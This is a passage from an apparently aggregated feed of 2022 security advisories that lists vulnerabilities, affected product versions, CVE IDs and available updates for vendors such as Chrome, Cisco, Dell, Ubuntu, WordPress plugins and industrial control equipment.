Chrome Beta 105 (105.0.5195.19) for iOS, and Chrome Beta 105 (105.0.5195.17) for Android to
resolve multiple vulnerabilities.
CVE ID: CVE-2022-2609 (High), CVE-2022-2620 (Medium), CVE-2022-2608 (High),
CVE-2022-2613 (Medium), CVE-2022-2607 (High)
Multiple vulnerabilities have been discovered in several IBM
products. An attacker can exploit these vulnerabilities to take control of an affected
system. The updates are available.
Multiple vulnerabilities have been discovered in several NetApp products. An attacker can
exploit these vulnerabilities to take control of an affected system. Security updates are
available.
It has been discovered that OMICARD EDM has a hard-coded machine key. An unauthenticated
remote attacker can use this machine key to send serialized payload to the server to execute
arbitrary code, manipulate system data and disrupt service.
CVE ID: CVE-2022-32965 (Critical)
DrayTek has released
security update to address a Remote Code Execution(RCE)
vulnerability in DrayTek Vigor Routers. An attacker can exploit
this vulnerability to take control of an affected system. CVE ID: CVE-2022-32548 (Critical)
Ubuntu has released security updates to resolve multiple vulnerabilities in NVIDIA graphics
drivers that can cause a Denial of Service (DoS) or possibly execute arbitrary code. The
affected products are Ubuntu 22.04, Ubuntu 20.04 & Ubuntu 18.04.
CVE ID: CVE-2022-31607, CVE-2022-31615, CVE-2022-31608
Synology has released security updates to address multiple vulnerabilities in its several
products.
CVE ID: CVE-2022-27618 (Medium), CVE-2022-27621 (Medium), CVE-2022-27620 (Medium),
CVE-2022-27619 (Medium)
Multiple vulnerabilities have been discovered in several IBM products. An attacker can
exploit these vulnerabilities to take control of an affected system. The updates are
available.
Multiple vulnerabilities have been discovered in several NetApp products. An attacker can
exploit these vulnerabilities to take control of an affected system. Security updates are
available.
A prototype pollution vulnerability has been discovered in the GitHub repository
automattic/mongoose. The affected versions are GitHub repository automattic/mongoose prior
to 6.4.6.
CVE ID: CVE-2022-2564 (Critical)
A buffer overflow vulnerability has been discovered in the cgi component of Synology Audio
Station that allows remote attackers to execute arbitrary commands via unspecified vectors.
The affected versions are Synology Audio Station before 6.5.4-3367.
CVE ID: CVE-2022-27612 (Critical)
A buffer overflow vulnerability has been discovered in the cgi component of Synology Media
Server that allows remote attackers to execute arbitrary code via unspecified vectors. The
affected versions are Synology Media Server before 1.8.1-2876.
CVE ID: CVE-2022-22683 (Critical)
A vulnerability has been discovered in PHP fileinfo functions which can lead to heap
corruption. The affected versions are PHP versions 8.1.x & below 8.1.8.
CVE ID: CVE-2022-31627 (Critical)
An out of bounds read vulnerability has been discovered in Google Chrome that allows to
compromise the renderer process to potentially perform a sandbox escape via a crafted HTML
page. The affected versions are Google Chrome prior to 102.0.5005.115.
CVE ID: CVE-2022-2010 (Critical)
An OS command injection vulnerability has been discovered in the OX App Suite. The affected
versions are OX App Suite through 7.10.6.
CVE ID: CVE-2022-24405 (Critical)
It has been discovered that a vulnerability in adm.cgi of WAVLINK WN535 G3
M35G3R.V5030.180927 allows attackers to execute arbitrary code via a crafted POST request.
CVE ID: CVE-2022-34577 (Critical)
A Remote Code Execution (RCE) vulnerability has been discovered in Zoho ManageEngine
Password Manager Pro before 12101 and PAM360 before 5510 & ManageEngine Access Manager Plus
before 4303.
CVE ID: CVE-2022-35405 (Critical)
Cisco has released security updates to resolve several vulnerabilities in multiple Cisco
products. An attacker can exploit these vulnerabilities to take control of an affected
system.
CVE ID: CVE-2022-20827 (Critical), CVE-2022-20841 (High), CVE-2022-20842 (Critical),
CVE-2022-20820 (Medium), CVE-2022-20852 (Medium), CVE-2022-20914 (Medium), CVE-2022-20816
(Medium), CVE-2022-20869 (Medium)
It has been discovered that Intel RetBleed CPU vulnerability affects multiple F5 products
that allow information disclosure.
CVE ID: CVE-2022-29901 (Medium)
Ubuntu has released security updates to address several vulnerabilities in multiple
products. An attacker can exploit these vulnerabilities to take control of an affected
system.
CVE ID: CVE-2022-34918 (High), CVE-2022-30783 (Medium), CVE-2022-30784 (Medium),
CVE-2022-30786 (Medium), CVE-2022-30788 (Medium), CVE-2022-30789 (Medium), CVE-2022-30785
(Medium), CVE-2022-30787 (Medium), CVE-2022-1679 (High), CVE-2022-28893 (High),
CVE-2022-1652 (High)
Multiple Cross-Site Request Forgery (CSRF) vulnerabilities have been discovered in uContext
for Clickbank WordPress plugins, uContext for Amazon WordPress plugins, Link Optimizer Lite
WordPress plugins, and Banner Cycler WordPress plugins.
CVE ID: CVE-2022-2542 (High), CVE-2022-2541 (High), CVE-2022-2540 (High),
CVE-2022-2233 (High)
Dell has released security updates to address multiple vulnerabilities in third-party
components that affect Dell Data Computing Appliance (DCA). An attacker can exploit these
vulnerabilities to take control of an affected system.
Multiple vulnerabilities have been discovered in several Fortinet products. Security updates
are available.
CVE ID: CVE-2022-27484 (Medium), CVE-2022-23442 (Medium), CVE-2022-22299
(High)
NVIDIA has released security updates for NVIDIA GPU Display Driver to address multiple
vulnerabilities that can lead to Denial of Service (DoS), information disclosure, escalation
of privileges, code execution, or data tampering.
Google has released Beta channel 104.0.5112.83 (Platform version: 14909.100.0) for most
ChromeOS devices, Chrome Dev 105 (105.0.5195.17) for Android, Chrome Stable 104
(104.0.5112.71) for iOS, Chrome 104 (104.0.5112.69) for Android, and Chrome 104.0.5112.79
(Mac/linux) and 104.0.5112.79/80/81 (Windows) to resolve multiple vulnerabilities.
CVE ID: CVE-2022-2603, CVE-2022-2604, CVE-2022-2605,CVE-2022-2606,CVE-2022-2607,
CVE-2022-2608, CVE-2022-2609,CVE-2022-2610,CVE-2022-2611, CVE-2022-2612,
CVE-2022-2613,CVE-2022-2614,CVE-2022-2615, CVE-2022-2616, CVE-2022-2617,CVE-2022-2618,
CVE-2022-2619,CVE-2022-2620, CVE-2022-2621,
CVE-2022-2622,CVE-2022-2623,CVE-2022-2624
It has been discovered that EasyUse MailHunter Ultimates cookie deserialization function has
an inadequate validation vulnerability that allows an unauthenticated remote attacker to
execute arbitrary code, manipulate system commands or interrupt service.
CVE ID: CVE-2022-35223 (Critical)
An incorrect access control vulnerability has been discovered in HashiCorp product Vault
Enterprise. The affected products are Vault Enterprise 1.7.0 through 1.9.7, 1.10.4, and
1.11.0.
CVE ID: CVE-2022-36129 (Critical)
It has been discovered that in mistune the support of inline markup is implemented by using
regular expressions that can involve a high amount of backtracking on certain edge cases.
The affected versions are mistune through 2.0.2.
CVE ID: CVE-2022-34749 (Critical)
Mitsubishi Electric has released security updates to address OpenSSL vulnerabilities in its
product- GT SoftGOT2000 that can cause Denial of Service (DoS), and arbitrary command
execution. The affected product is GT SoftGOT2000 version 1.275M.
CVE ID: CVE-2022-1292 (Critical), CVE-2022-0778 (High)
Multiple vulnerabilities such as buffer overflow, command injection, information disclosure,
Denial of Service (DoS), and hard-coded credentials have been discovered in TCL LinkHub Mesh
Wi-Fi system.
GitLab has released Community Edition and Enterprise Edition version 15.2.2 to resolve a
number of regressions and bugs in 15.2 release and prior versions.
Android has released security bulletin to resolve multiple vulnerabilities affecting several
Android devices. Security patch levels of 2022-08-05 or later, address all of these issues.
NetApp has released security updates to resolve multiple vulnerabilities in several NetApp
products. An attacker can exploit these vulnerabilities to take control of an affected
system.
Openstack manilla has released security updates to address a vulnerability in Openstack
manilla owning a Ceph File system "share", which can compromise the confidentiality and
integrity of a file system. The vulnerability has been fixed in RHCS 5.2 and Ceph 17.2.2.
CVE ID: CVE-2022-0670 (Critical)
A vulnerability has been discovered in Joplin that allows attackers to execute arbitrary
commands via a crafted payload injected into the Node titles. The affected version is Joplin
v2.8.8.
CVE ID: CVE-2022-35131 (Critical)
A vulnerability has been discovered in OpenKM Community Edition which allows an attacker to
perform a XML external entity injection attack. The affected version is OpenKM Community
Edition 6.3.10 and before.
CVE ID: CVE-2022-2131 (Critical)
It has been discovered that software/apt-lib.pl in Webmin lacks HTML escaping for a UI
command. The affected versions are Webmin prior to 1.997
CVE ID: CVE-2022-36446 (Critical)
A Remote Code Execution (RCE) vulnerability has been discovered in Atos Unify OpenScape that
can compromise the confidentiality and integrity of the system. The affected versions are
Atos Unify OpenScape SBC 9 and 10 before 10R2.2.1, Atos Unify OpenScape Branch 9 and 10
before version 10R2.1.1, and Atos Unify OpenScape BCF 10 before 10R9.12.1.
CVE ID: CVE-2022-36444 (Critical)
It has been discovered that the Cab fare calculator WordPress plugin does not validate the
controller parameter before using it in require statements, which can lead to Local File
Inclusion (LFI) vulnerability. The affected versions are Cab fare calculator WordPress
plugin before 1.0.4.
CVE ID: CVE-2022-1391 (Critical)
Dell has released security updates to address multiple authentication bypass vulnerabilities
in its products. The affected products are Dell PowerProtect Cyber Recovery, and Dell
CloudLink.
CVE ID: CVE-2022-34372 (Critical), CVE-2022-34380 (Critical), CVE-2022-34379
(Critical)
It has been discovered that Obsidian allows obsidian://hook-get-address remote code
execution vulnerability because window.open is used without checking the URL. The affected
versions are Obsidian 0.14.x and 0.15.x before 0.15.5.
CVE ID: CVE-2022-36450 (Critical)
A vulnerability has been discovered in the /api/plugin/upload component of Dataease that
allow attackers to execute arbitrary code via a crafted plugin. The affected version is
Dataease v1.11.1.
CVE ID: CVE-2022-34113 (Critical)
Multiple Unauthenticated SQL Injection (SQLi) vulnerabilities have been discovered in
Osamaesh WP Visitor Statistics plugin of WordPress. The affected versions are Osamaesh WP
Visitor Statistics plugin including 5.7 and below.
CVE ID: CVE-2022-33965 (Critical)
WordPress has released security update to address a Cross-Site Scripting vulnerability in
Simple SEO plugin for WordPress. The affected versions are Simple SEO versions up to, and
including 1.7.91.
CVE ID: CVE-2022-1628 (Medium)
NetApp has released security updates to resolve multiple vulnerabilities in several NetApp
products. An attacker can exploit these vulnerabilities to take control of an affected
system.
Ubuntu has released security updates to resolve multiple vulnerabilities in Linux kernel.
The affected products are Ubuntu 16.04 ESM, and Ubuntu 14.04 ESM.
CVE ID: CVE-2022-20141 (High), CVE-2022-25258 (Medium), CVE-2022-25375 (Medium),
CVE-2022-34918 (High)
Foxit has released an updated Foxit PDF Reader 12.0.1 & Foxit PDF Editor 12.0.1 for Window
platform to resolve multiple vulnerabilities in Foxit PDF Reader version 12.0.0.12394 &
earlier, & Foxit PDF Editor version 12.0.0.12394, 11.2.2.53575 & all previous 11.x versions,
10.1.8.37795 & earlier and released updated Foxit PDF Editor for Mac 12.0.1 and Foxit PDF
Reader for Mac 12.0.1 to resolve multiple vulnerabilities in Foxit PDF Editor for
Mac versions 12.0.0.0601, 11.1.2.0420 & earlier & Foxit PDF Reader for Mac version
12.0.0.0601, 11.1.2.0420 and earlier.
A Denial of Service (DoS) vulnerability has been discovered in Yokogawa CENTUM controller
FCS. The affected products are CENTUM VP, and CENTUM CS 3000 controller FCS.
CVE ID: CVE-2022-33939 (Medium)
GitLab has released updated versions 15.2.1, 15.1.4, and 15.0.5 for GitLab Community Edition
(CE) and Enterprise Edition (EE) to resolve multiple vulnerabilities.
Mozilla has released security updates to address multiple vulnerabilities in Thunderbird
102.1, and Thunderbird 91.12. An attacker can exploit these vulnerabilities to take control
of an affected system.
CVE ID: CVE-2022-36319 (Medium), CVE-2022-36318 (Medium), CVE-2022-36314 (Medium),
CVE-2022-2505 (High)
Multiple vulnerabilities have been discovered in several IBM products. An attacker can
exploit these vulnerabilities to take control of an affected system. The updates are
available.
A type confusion vulnerability has been discovered in Rockwell Automation's Equipment-
FactoryTalk Software, Enhanced HIM for PowerFlex, and Connected Components Workbench that
can cause a Denial of Service condition. The affected products are FactoryTalk Linx
Enterprise software versions 6.20, 6.21, and 6.30, Enhanced HIM (eHIM) for PowerFlex 6000T
version 1.001, Connected Components Workbench software versions 11, 12, 13, and 20
and FactoryTalk View Site Edition version 13.
CVE ID: CVE-2022-1096 (Medium)
Google Chrome has released Dev channel 105.0.5195.10 for Windows, Mac and Linux, Chrome Beta
105 (105.0.5195.7) for iOS, and Chrome Dev 105 (105.0.5195.8) for Android.
Multiple vulnerabilities have been discovered in PyPI that lead to a code execution backdoor
vulnerability inserted by a third party.
CVE ID: CVE-2022-34983 (Critical), CVE-2022-34982 (Critical), CVE-2022-34981
(Critical), CVE-2022-34509 (Critical), CVE-2022-34501 (Critical), CVE-2022-34500
(Critical)
It has been discovered that the Apache Xalan Java XSLT library is vulnerable to an integer
truncation vulnerability when processing malicious XSLT stylesheets. This can be used to
corrupt Java class files generated by the internal XSLTC compiler and execute arbitrary Java
bytecode.
CVE ID: CVE-2022-34169 (Critical)
An arbitrary file upload vulnerability has been discovered in the file upload component of
ButterCMS that allows attackers to execute arbitrary code via a crafted SVG file. The
affected version is ButterCMS v1.2.8.
CVE ID: CVE-2022-27260 (Critical)
Red Hat has released security updates to address multiple vulnerabilities in Red Hat
OpenShift Enterprise ASYNC Stream container images. The affected product is Red Hat
OpenShift Container Platform 4.6 for RHEL 8 x86_64.
CVE ID: CVE-2020-29368 (High), CVE-2022-27666 (High), CVE-2022-1012, CVE-2022-1729,
CVE-2022-32250 (High)
Samba has released security updates to address multiple vulnerabilities in several versions
of Samba. An attacker can exploit one of these vulnerabilities to take control of an
affected system.
CVE ID: CVE-2022-2031 (Medium), CVE-2022-32742 (Medium), CVE-2022-32744 (High),
CVE-2022-32745 (Medium), CVE-2022-32746 (Medium)
CODESYS has released security updates to address multiple vulnerabilities in several CODESYS
products. The affected products are CODESYS Development System prior version V3.5.17.10 ,
CODESYS Installer prior version V1.3.0 , CODESYS SVN prior version V4.4.0.0 and CODESYS
Development System V3 setup from V3.5.17.0 & before V3.5.18.20.
CVE ID: CVE-2021-21863 (High), CVE-2021-21864 (High), CVE-2021-21865 (High),
CVE-2021-21866 (High), CVE-2021-21867 (High), CVE-2021-21868 (High), CVE-2021-21869
(High)
Multiple vulnerabilities have been discovered in several Jenkins Plugins. An attacker can
exploit these vulnerabilities to take control of an affected system. The updates are
available.
Dell has released security updates to address multiple vulnerabilities in several products.
An attacker can exploit these vulnerabilities to take control of an affected system.
Google Chrome has released Beta channel 104.0.5112.65 for Windows, Mac and Linux, Chrome
Beta 104 (104.0.5112.69) for Android, Dev channel 105.0.5195.5 (Platform version:
14989.11.0) for most ChromeOS devices, and LTS channel 96.0.4664.215 (Platform Version:
14268.94.0) for most ChromeOS devices to resolve multiple vulnerabilities.
CVE ID: CVE-2022-2010 (High), CVE-2022-1488 (Medium), CVE-2021-30560 (Medium),
CVE-2022-29824 (Medium)
Multiple vulnerabilities have been discovered in several IBM products. An attacker can
exploit these vulnerabilities to take control of an affected system. The updates are
available.
Multiple vulnerabilities have been discovered in several NetApp products. An attacker can
exploit these vulnerabilities to take control of an affected system. Security updates are
available.
It has been discovered that an insufficient policy enforcement vulnerability in the
developer tools of Google Chrome allowed a remote attacker to potentially perform a sandbox
escape via a crafted HTML page. The affected versions are Google Chrome prior to
100.0.4896.88.
CVE ID: CVE-2022-1309 (Critical)
An authorization bypass vulnerability has been discovered in Web page "wizardpwd.asp" of
ALLNET router. The affected version is ALLNET Router model WR0500AC.
CVE ID: CVE-2022-34767 (Critical)
Multiple vulnerabilities have been discovered in Cisco Nexus Dashboard which allow execution
of arbitrary commands, read or upload container image files, or perform a Cross-Site Request
Forgery (CSRF) attack.
CVE ID: CVE-2022-20858 (Critical), CVE-2022-20857 (Critical)
It has been discovered that Wavlink WN530HG4 M30HG4.V5030.191116 contains a hardcoded
encryption/decryption key for its configuration files at
/etc_ro/lighttpd/www/cgi-bin/ExportAllSettings.sh.
CVE ID: CVE-2022-34045 (Critical)
It has been discovered that Goldshell ASIC Miners contain a hardcoded credentials
vulnerability which allows attackers to remotely connect via the SSH protocol (port 22). The
affected version is Goldshell ASIC Miners v2.1.x.
CVE ID: CVE-2022-24657 (Critical)
It has been discovered that an on-premise installation of the Pega Platform is configured
with the port for the JMX interface, if exposed to the Internet, can cause upload serialized
payloads as port filtering is not properly configured in the system.
CVE ID: CVE-2022-24082 (Critical)
A vulnerability has been discovered in Easergy P5 version V01.401.102 & prior that can
result in Remote Code Execution (RCE) or the crash of HTTPs stack which is used for the Web
HMI device.
CVE ID: CVE-2022-34756 (Critical)
A SQL injection vulnerability has been discovered in the lux extension for TYPO3. The
affected versions are TYPO3 lux extension before 17.6.1, and 18.x through 24.x before
24.0.2.
CVE ID: CVE-2022-35628 (Critical)
It has been discovered that FreeType commit 1e2eb65048f75c64b68708efed6ce904c31f3b2f
contains a heap buffer overflow vulnerability via the function sfnt_init_face.
CVE ID: CVE-2022-27404 (Critical)
A memory corruption vulnerability has been discovered in the cgi.c unescape functionality of
ArduPilot APWeb master branch 50b6b7ac - master branch 46177cb9.
CVE ID: CVE-2022-28711 (Critical)
It has been discovered that COVID19 Testing Management System contain SQL Injection
vulnerability via the admin panel. The affected version is COVID19 Testing Management System
1.0.
CVE ID: CVE-2021-33470 (Critical)
It has been discovered that in Octopus Deploy the Octopus variables that are sourced from
the target do not have sensitive values obfuscated in the deployment logs. The affected
versions are Octopus Deploy 2018.4.4 through 2018.5.1.
CVE ID: CVE-2018-11320 (Critical)
It has been discovered that multiple vulnerabilities in Node.js affect F5 products. An
attacker can exploit these vulnerabilities to perform domain hijacking or injection attacks.
The affected products are BIG-IP (all modules), and BIG-IQ Centralized Management.
CVE ID: CVE-2021-3672 (Medium), CVE-2021-22931 (Critical)
Multiple vulnerabilities have been discovered in ABB Ability(TM) Operations Data Management
Zenon. Successful exploitation can allow attackers to log additional messages and access
files from the Zenon system. The affected versions are Zenon all versions upto 8.20.
CVE ID:CVE-2022-34836 (Medium), CVE-2022-34837 (Medium), CVE-2022-34838
(High)
An authentication bypass vulnerability has been discovered in CodexShaper's WP OAuth2 Server
plugin at WordPress. The affected versions are CodexShaper's WP OAuth2 Server plugin 1.0.1
and below.
CVE ID: CVE-2022-34839 (Critical)
Honeywell has released security updates to address multiple OT:ICEFALL vulnerabilities in
Honeywell's Equipment- Saia Burgess PG5 PCD that can allow configuration manipulation.
CVE ID: CVE-2022-30319 (High), CVE-2022-30320 (High)
Honeywell has released security updates to address multiple vulnerabilities in Honeywell's
Equipment- Safety Manager that can allow for configuration and firmware manipulation or
Remote Code Execution (RCE).
CVE ID: CVE-2022-30313 (High), CVE-2022-30314 (High), CVE-2022-30315 (High),
CVE-2022-30316 (High)
MOXA has released security updates to address multiple out-of-bounds write vulnerabilities
in MOXA's Equipment- NPort 5110 that can allow an attacker to change memory values and/or
cause the device to become unresponsive.
CVE ID: CVE-2022-2044 (High), CVE-2022-2043 (High)
Inductive Automation has released security updates to address an improper restriction of XML
External Entity Reference vulnerability in Inductive Automation's Equipment- Ignition that
can allow an attacker to obtain file contents.
CVE ID: CVE-2022-1704 (High)
Dell has released security updates to address several vulnerabilities in its products. The
affected products are Dell Command | Integration Suite for System Center, Dell Secure
Connect Gateway, and Dell Policy Manager for Secure Connect Gateway.
CVE ID: CVE-2022-34373 (High)
Mozilla has released security updates to address multiple vulnerabilities in Firefox ESR
102.1, Firefox ESR 91.12, and Firefox 103. An attacker can exploit these vulnerabilities to
take control of an affected system.
Multiple vulnerabilities have been discovered in IBM products. An attacker can exploit these
vulnerabilities to take control of an affected system. The updates are available.
McAfee has released security update to address a DLL hijacking vulnerability in the McAfee
Agent (MA) Smart Installer for Windows. The affected versions are McAfee Agent (MA) Smart
Installer for Windows prior to 5.7.7.
CVE ID: CVE-2022-2313 (High)
A vulnerability has been discovered in WAVLINK WN535K2 and WN535K3 that affects unknown code
of the file /cgi-bin/nightled.cgi. The manipulation of the argument start_hour leads to OS
Command Injection vulnerability.
CVE ID: CVE-2022-2487 (Critical)
A vulnerability has been discovered in WAVLINK WN535K2 and WN535K3 that affects an unknown
part of the file /cgi-bin/mesh.cgi?page=upgrade. The manipulation of the argument key leads
to OS Command Injection vulnerability.
CVE ID: CVE-2022-2486 (Critical)
It has been discovered that the mstatus.sd field in CVA6 commit
d315ddd0f1be27c1b3f27eb0b8daf471a952299a does not update when the mstatus.fs field is set to
Dirty.
CVE ID: CVE-2022-34635 (Critical)
It has been discovered that Rocket-Chip commit 4f8114374d8824dfdec03f576a8cd68bebce4e56
contains an insufficient cryptography vulnerability via the component
/rocket/RocketCore.scala.
CVE ID: CVE-2022-34632 (Critical)
A Remote Command Execution (RCE) vulnerability has been discovered in Spryker Commerce. The
affected version is Spryker Commerce OS 1.4.2.
CVE ID: CVE-2022-28888 (Critical)
It has been discovered that WolfSSH contains an integer overflow vulnerability via the
function wolfSSH_SFTP_RecvRMDIR. The affected version is WolfSSH v1.4.7.
CVE ID: CVE-2022-32073 (Critical)
A Remote Code Execution (RCE) vulnerability has been discovered in Roxy-WI. The affected
versions are Roxy-WI versions prior to 6.1.1.0.
CVE ID: CVE-2022-31137 (Critical)
A heap-based buffer over-read vulnerability has been discovered in singlevar in lparser.c in
Lua. The affected versions are Lua from (including) 5.4.0 up to (excluding) 5.4.4.
CVE ID: CVE-2022-28805 (Critical)
Ubuntu has released security updates to address several vulnerabilities in multiple
products. An attacker can exploit these vulnerabilities to take control of an affected
system.
CVE ID: CVE-2022-32546 (High), CVE-2022-32547 (High), CVE-2022-32545 (High),
CVE-2022-31799 (Critical), CVE-2022-2129 (High), CVE-2022-33070 (Medium)
Multiple vulnerabilities have been discovered in Nuki (smart lock) products. An attacker can
exploit these vulnerabilities to take control of an affected system.
CVE ID:CVE-2022-32509 (High), CVE-2022-32504 (High), CVE-2022-32502 (High),
CVE-2022-32507 (High), CVE-2022-32503 (High), CVE-2022-32510 (High), CVE-2022-32506
(Medium), CVE-2022-32508 (Medium), CVE-2022-32505 (Medium)
FileWave has released security updates to address an authentication bypass, and hard-coded
cryptographic key vulnerabilities in FileWave’s mobile device management (MDM) system. The
affected versions are FileWave MDM before version 14.6.3 and 14.7.x, prior to 14.7.2.
CVE ID: CVE-2022-34907 (Critical), CVE-2022-34906 (Critical)
It has been discovered that Dataease contains a SQL injection vulnerability via the
parameter dataSourceId. The affected version is Dataease v1.11.1.
CVE ID: CVE-2022-34115 (Critical)
It has been discovered that the package convert-svg-core is vulnerable to Remote Code
Injection via sending an SVG file containing the payload. The affected versions are
convert-svg-core before 0.6.2.
CVE ID: CVE-2022-25759 (Critical)
It has been discovered that Nginx NJS contains an out-of-bounds read vulnerability via
njs_scope_value at njs_scope.h. The affected version is Nginx NJS v0.7.4.
CVE ID: CVE-2022-34029 (Critical)
It has been discovered that UNIT4 TETA Mobile Edition (ME) contains a SQL injection
vulnerability via the ProfileName parameter in the errorReporting page. The affected version
is UNIT4 TETA Mobile Edition (ME) before 29.5.HF17.
CVE ID: CVE-2022-27434 (Critical)
A vulnerability has been discovered in the ContentResource API of dotCMS. This vulnerability
allows an unauthenticated attacker to upload an executable file, such as a .jsp file, that
can lead to remote code execution. The affected versions are dotCMS 3.0 through 22.02.
CVE ID: CVE-2022-26352 (Critical)
It has been discovered that the Scoptrial package in PyPI contain a code execution backdoor
vulnerability via the request package. This vulnerability allows attackers to access
sensitive user information and digital currency keys, as well as escalate privileges. The
affected version is PyPI v0.0.5.
CVE ID: CVE-2022-34057 (Critical)
It has been discovered that libnx_apl.so on Nexans FTTO GigaSwitch implements a Backdoor
Account for SSH logins on port 50200 or 50201. The affected versions are Nexans FTTO
GigaSwitch before 6.02N and 7.x before 7.02.
CVE ID: CVE-2022-32985 (Critical)
Skyhigh has released security updates to address Authentication Bypass, and Improper
Neutralization of Special Elements in Output Used by a Downstream Component vulnerabilities
in Secure Web Gateway (SWG). The affected versions are SWG 11.x earlier than 11.2.1, SWG
10.x earlier than 10.2.12, SWG 9.x earlier than 9.2.23, and SWG 8.x earlier than 8.2.28.
CVE ID: CVE-2022-2310 (Critical), CVE-2022-34914 (Critical)
Ubuntu has released security updates to address a vulnerability in PHP. A remote attacker
can use this vulnerability to cause PHP to crash, resulting in a denial of service, or
possibly execute arbitrary code. The affected products is Ubuntu 22.04 LTS.
CVE ID: CVE-2022-31627
Multiple vulnerabilities such as Sensitive Information Disclosure, and Unauthorized Setting
Changes have been discovered in Transposh WordPress Translation WordPress plugins. The
affected versions are Transposh WordPress Translation versions up to, and including,
1.0.8.1.
CVE ID: CVE-2022-2462 (Medium), CVE-2022-2461 (Medium)
Multiple vulnerabilities have been discovered in IBM products. An attacker can exploit these
vulnerabilities to take control of an affected system. The updates are available.
It has been discovered that Barangay Management System contain a SQL injection vulnerability
via the hidden_id parameter at /officials/officials.php. The affected version is Barangay
Management System v1.0.
CVE ID: CVE-2022-34023 (Critical)
A vulnerability has been discovered in Poly EagleEye Director II. Existence of a certain
file (which can be created via an rsync backdoor) causes all API calls to execute as admin
without authentication. The affected versions are Poly EagleEye Director II before 2.2.2.1.
CVE ID: CVE-2022-26479 (Critical)
Roxy-WI has released security update to address a vulnerability that allows the system
command to be run remotely via the subprocess_execute function without processing the inputs
received from the user in the /app/options.py file. The affected versions are Roxy-WI Prior
to version 6.1.1.0. Roxy-WI version 6.1.1.0 contains a patch for this vulnerability.
CVE ID: CVE-2022-31161 (Critical)
Heap-based buffer over-read vulnerability has been discovered in Mbed TLS. This
vulnerability can cause a server crash or possibly information disclosure based on error
responses. The affected versions are Mbed TLS before 2.28.2 and 3.x before 3.2.0.
CVE ID: CVE-2022-35409 (Critical)
Heap-based buffer overflow vulnerability has been discovered in sqbaselib.cpp in SQUIRREL
due to lack of a certain sq_reservestack call. The affected versions is SQUIRREL 3.2.
CVE ID: CVE-2022-30292 (Critical)
It has been discovered that Irzip contains a heap memory corruption via the component
lrzip.c:initialise_control. The affected versions is Irzip v0.640.
CVE ID: CVE-2022-28044 (Critical)
Stored Cross-Site Scripting vulnerability has been discovered in Stockists Manager for
Woocommerce and Simple Banner WordPress plugins. Security update is available for Simple
Banner WordPress plugins. No patches are available for Stockists Manager for Woocommerce
WordPress plugins.
CVE ID: CVE-2022-2518 (High), CVE-2022-2515 (Medium)
Multiple vulnerabilities have been discovered in several IBM products. An attacker can
exploit these vulnerabilities to take control of an affected system. The updates are
available.
SonicWall has released security updates to address SQL Injection vulnerability. The affected
products are SonicWall GMS 9.3.1-SP2-Hotfix1 and earlier versions, and Analytics On-Prem
2.5.0.3-2520 and earlier versions.
CVE ID:CVE-2022-22280 (Critical)
Open-Xchange has released security updates to address multiple vulnerabilities in its OX App
Suite products. An attacker can exploit these vulnerabilities to take control of an affected
system.
CVE ID:CVE-2022-23100 (High), CVE-2022-23099 (Low), CVE-2021-42550, CVE-2022-23101
(Medium), CVE-2022-24405 (High), CVE-2022-24406 (Medium)
Dell has released security updates to address a third-party component (Polkit) vulnerability
in Dell Disk Library for mainframe (DLm). The affected versions are Models DLm8500 and DLm
2500 running DLm versions before 5.5.0.0.
CVE ID: CVE-2021-4034 (High)
Dell has released security updates to address an Improper Handling of Insufficient
Permissions or Privileges vulnerability in Dell EMC NetWorker. The affected versions are
Dell EMC NetWorker 19.2.1.x 19.3.x, 19.4.x, 19.5.x, 19.6.x, and 19.7.0.0.
Google Chrome has released Beta channel 104.0.5112.57 (Platform version: 14909.79.0) for
most ChromeOS devices, Dev channel 105.0.5191.0 for Mac and Windows & 105.0.5191.2 for
Linux, and Chrome Dev 105 (105.0.5190.2) for Android.
Johnson Controls has released security updates to address a vulnerability impacting Metasys
ADS/ADX/OAS with MUI that allow an unauthenticated user to access the Metasys ADS/ADX/OAS
with MUI web API and enumerate users. The affected products are all Metasys ADS/ADX/OAS 10
and 11 versions with MUI.
CVE ID: CVE-2021-36200
Multiple vulnerabilities have been discovered in several IBM products. An attacker can
exploit these vulnerabilities to take control of an affected system. The updates are
available.
Rockwell Automation has released security updates to resolve deserialization of untrusted
data and path traversal vulnerabilities in Rockwell Automation's Equipment- ISaGRAF
Workbench that can result in directory traversal, privilege escalation, and arbitrary code
execution.
CVE ID: CVE-2022-2463 (Medium), CVE-2022-2464 (High), CVE-2022-2465
(High)
ABB has released security updates to address an improper privilege management vulnerability
in ABB's Equipment- Drive Composer, Automation Builder & Mint Workbench. Successful
exploitation can allow Remote Code Execution. The affected products are ABB Drive Composer
Entry versions 2.0 to 2.7, ABB Drive Composer Pro versions 2.0 to 2.7 and ABB Automation
Builder versions 1.1.0 to 2.5.0 and Mint Workbench- Builds 5866 and prior.
CVE ID: CVE-2022-31216 (High), CVE-2022-31217 (High), CVE-2022-31218 (High),
CVE-2022-31219 (High), CVE-2022-26057 (Medium)
A session hijacking vulnerability has been discovered in Inductive Automation Ignition
before 7.9.20 and 8.x before 8.1.17.
CVE ID: CVE-2022-35890 (Critical)
A Server-Side Request Forgery (SSRF) vulnerability via the whois lookup tool has been
discovered in Best Practical's RT for Incident Response (RTIR). The affected versions are
RTIR before 4.0.3 and 5.x before 5.0.3.
CVE ID: CVE-2022-25800 (Critical)
It has been discovered that android exported is used to set third-party app access
permissions, and the default value of intent-filter is true. com.sprd.firewall has set
exported as true.Product: AndroidVersions: Android SoCAndroid ID: A-231911916. Security
updates are available.
CVE ID: CVE-2022-20216 (Critical)
It has been discovered that Altra reference design of UEFI accesses allows insecure access
to SPI-NOR by the OS/hypervisor component. The affected versions are Ampere Altra and
AltraMax devices before SRP 1.09.
CVE ID: CVE-2022-32295 (Critical)
A vulnerability has been discovered in IOBit IOTransfer which can cause data theft and
Remote Code Execution (RCE). The affected version is IOBit IOTransfer 4.3.1.1561.
CVE ID: CVE-2022-24562 (Critical)
An improper access control vulnerability has been discovered in SonicWall SMA1000 series
firmware 12.4.0, 12.4.1-02965 and earlier versions.
CVE ID: CVE-2022-22282 (Critical)
AutomationDirect has released security updates to address a cleartext transmission of
sensitive information vulnerability in AutomationDirect's Equipment- Stride Field I/O that
can allow an attacker to obtain user credentials.
CVE ID: CVE-2022-2485 (Critical)
Apple has released security updates to resolve multiple vulnerabilities in its products. An
attacker can exploit these vulnerabilities to take control of an affected system.
Google Chrome has released Dev channel 105.0.5187.0 (Platform version: 14985.0.0) for most
ChromeOS devices, Chrome Beta 104 (104.0.5112.54) for iOS, Extended Stable channel
102.0.5005.167 for Windows and Mac, Beta channel 104.0.5112.57 for Windows, Mac and Linux,
